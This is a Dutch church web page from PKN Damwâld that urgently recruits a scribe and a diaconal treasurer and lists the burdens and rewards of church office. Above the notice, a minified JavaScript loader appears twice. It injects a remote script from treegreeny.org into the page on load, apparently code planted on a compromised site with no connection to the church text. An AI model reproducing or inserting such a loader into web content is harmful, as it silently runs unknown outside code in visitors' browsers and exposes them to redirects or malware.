;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Met spoed gezocht … scriba en penningmeester diaconie Hervormd Akerwoude c.a. - PKN Damwâld

Met spoed gezocht … scriba en penningmeester diaconie Hervormd Akerwoude c.a.

Gepubliceerd op: dinsdag 7 februari

Hoe zou je, nu met de naderende verhuizing van onze scriba en penningmeester diaconie, het vinden om ambtsdrager te worden? Scriba, ouderling of (penningmeester-) diaken of noem maar op? Misschien zeg je: ‘geen denken aan!’ en wil je gauw verder bladeren. Wacht dan even en lees door.

Niet voor mij!    Want, inderdaad, er zijn nogal wat redenen om nee te zeggen tegen het ambt. Je hebt het hartstikke druk met je gezin, je werk, je kinderen. Je bent met pensioen en je wilt je niet voor vier jaar vastleggen. Je hebt geleerd dat het belangrijk is tijd vrij te maken voor jezelf, voor sport en ontspanning. Je vraagt je af: ‘Ben ik wel geschikt; kan ik dat wel, mensen bezoeken, vergaderen, vooraan in de kerk staan, bidden in de consistorie en heb ik wel genoeg kennis en geloof om zoiets te doen?’.

De minnen – –    Ja, wat zijn de minnen die het ambt bij sommigen oproept? Ik doe te weinig en daar voel ik mij schuldig over; soms heb ik nog het oude beeld van ouderling X op mijn netvlies en daar beantwoord ik niet aan; de kerk lijdt aan gebrek aan daadkracht; de samenwerkingen met andere wijken en kerken is te gering; ik kom bij allerlei mensen niet binnen; echt innoveren in de kerk is moeilijk; het ambt heeft iets eenzaams, soms ben je bezig met dingen die zelfs je partner anders of niet beleeft.

De plussen +++   Daarnaast zijn er verrassend veel plussen te noemen! Het ambt geeft energie; het ambt helpt bij mijn eigen geloofsopbouw, ik kom vaker in de kerk en het doet me meer; ik word enthousiast van al die gesprekken, zowel met ouderen als met jongeren; contacten met ambtsdragers uit andere wijken zijn mooie spiegelmomenten; het ambt helpt om echt iets te doen voor mensen: gemeentemaaltijden, Voedselbank, schuldhulpmaatje, hulpdienst, maar ook een telefoontje, kaartje. Je krijgt dat ook terug als je zelf ziek bent, gemeente-zijn is echt meer dan een mooi woord …

Actief zijn voor de kerk!   Misschien helpt het je om bij jezelf na te gaan hoe dat bij jou werkt en is je interesse gewekt. Mogelijk kom je tot de conclusie dat het ambt misschien wel iets voor jou is. Of dat je ontdekt dat andere taken, zoals wijkassistent veel beter bij je passen om actief te zijn in de geloofsgemeenschap. Voor meer informatie kun je contact opnemen met ds. G.J. Otter, scriba Geralda Teertstra of iemand die je kent uit de kerkenraad.

Ja, we hebben je zeer dringend nodig! Omdat het de kerkenraad steeds maar niet lukt om tijd om gemeenteleden te enthousiasmeren voor een ambt, brandbrieven blijkbaar niet aanspreken en een persoonlijke vraag of je mee wilt werken aan wat wij zoal met elkaar doen kennelijk niet landt, doen wij op deze manier nogmaals een zeer dringend beroep op jou! Zoals uit de titel hierboven blijkt, zijn we met heel veel spoed op zoek naar vrouwen en mannen die met ons de schouders er onder willen zetten. We rekenen op je!